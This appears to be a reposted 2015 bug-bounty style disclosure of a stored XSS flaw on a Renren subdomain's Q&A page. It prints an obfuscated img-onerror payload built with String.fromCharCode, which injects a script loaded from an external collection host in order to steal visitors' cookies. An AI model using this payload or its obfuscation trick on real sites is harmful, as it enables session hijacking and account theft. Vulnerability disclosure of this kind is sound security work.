人人网某分站存储型xss第二弹

存储型xss,可打cookie,引用某牛的话勿头痛医头脚痛医脚

详细说明:

http://dellcqg.renren.com/Qa/ask 单引号被转义

人人网某分站存储型xss第二弹

构造

<img src=1 onerror=document.body.appendChild(document.createElement(String.fromCharCode(115,99,114,105,112,116))).src=String.fromCharCode(104,116,116,112,58,47,47,121,108,97,120,102,99,121,46,53,48,48,121,117,110,46,99,111,109,47,120,120,120,120,115,115,120,120,120,46,106,115)>

可打到cookie

漏洞证明:

人人网某分站存储型xss第二弹

修复方案:

我是菜鸟,厂商比我懂的

分类:默认分类 时间:2015-03-02 人气:5
本文关键词:
分享到:

相关文章

Copyright (C) quwantang.com, All Rights Reserved.

趣玩堂 版权所有 京ICP备15002868号

processed in 0.075 (s). 10 q(s)